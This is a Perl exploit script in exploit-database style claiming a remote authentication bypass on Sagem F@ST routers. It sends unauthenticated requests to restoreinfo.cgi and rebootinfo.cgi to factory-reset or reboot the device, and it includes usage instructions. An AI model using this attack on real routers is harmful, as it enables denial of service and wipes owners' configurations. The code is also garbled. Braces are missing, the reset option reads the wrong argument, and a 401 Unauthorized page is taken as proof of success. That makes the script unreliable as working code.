# Exploit Title: Sagem routers Remote auth bypass Exploit
# Date: 04/03/2010
# Author: AlpHaNiX
# Software Link: null
# Version: Sagem Routers F@ST (1200/1240/1400/1400W/1500/1500-WG/2404
# Tested on: Sagem F@ST 2404
# Code :
use HTTP::Request;
use HTTP::Headers;
use LWP::UserAgent;
sub help()
print "\n[X] the target must be sagem rooter main ip adress\n".
"[X] affected Versions : Sagem Routers F@ST (1200/1240/1400/1400W/1500/1500-WG/2404)\n".
"[X] Usage : perl $0 --function ip \n".
"[X] Example : ./exploit.pl<http://exploit.pl> --reset \n".
"[X] Example : ./exploit.pl<http://exploit.pl> --reboot \n";
sub header()
print "\n[+]====================================[+]\n".
"[+] Sagem routers Remote Auth bypass [+]\n".
"[+] Found And Exploit By AlpHaNiX[+]\n".
"[+] Contact: AlpHa[at]Hacker[dot]Bz[+]\n".
"[+] HomePage : NullArea.Net[+]\n".
sub resetz()
my $target = $ipz."restoreinfo.cgi" ;
my $request = HTTP::Request->new(GET=>$target);
my $useragent = LWP::UserAgent->new();
my $response = $useragent->request($request);
if($response->content =~ m/<HTML><HEAD><TITLE>401 Unauthorized<\/TITLE><\/HEAD>/i && $response->content =~ m/<BODY BGCOLOR="#cc9999"><H4>401 Unauthorized<\/H4>/ && $response->content =~ m/<ADDRESS><A HREF="http:\/\/www.acme.com<http://www.acme.com>\/software\/micro_httpd\/">micro_httpd<\/A><\/ADDRESS>/ )
print "[+] Authentication bypassed !\n" ;
print "[+] Exploited , $ip is restored" ;
print "[+] Please make sure you entered real sagem router ip\n" ;
sub reboot()
my $target = $ipz."rebootinfo.cgi" ;
my $request = HTTP::Request->new(GET=>$target);
my $useragent = LWP::UserAgent->new();
my $response = $useragent->request($request);
if($response->content =~ m/<HTML><HEAD><TITLE>401 Unauthorized<\/TITLE><\/HEAD>/i && $response->content =~ m/<BODY BGCOLOR="#cc9999"><H4>401 Unauthorized<\/H4>/ && $response->content =~ m/<ADDRESS><A HREF="http:\/\/www.acme.com<http://www.acme.com>\/software\/micro_httpd\/">micro_httpd<\/A><\/ADDRESS>/ )
print "[+] Authentication bypassed !\n" ;
print "[+] Exploited , $ip is rebooted" ;
print "[+] Please make sure you entered real sagem router ip\n" ;
if (@ARGV != 2) { header();help(); exit(); }
my $i=0;
foreach (@ARGV)
if ($ARGV[$i] eq "--reboot"){$ip = $ARGV[$i+1];$function = 'reboot';}
if ($ARGV[$i] eq "--reset"){$ip = $ARGV[$i];$function = 'reset';}
if ($ip =~ /http:\/\// ) { $ipz = $ip."/"; } else { $ipz = "http://".$ip."/"}
print "[+] Working on $ip ..\n\n";
if($function eq 'reboot'){reboot()}
if($function eq 'reset'){resetz()}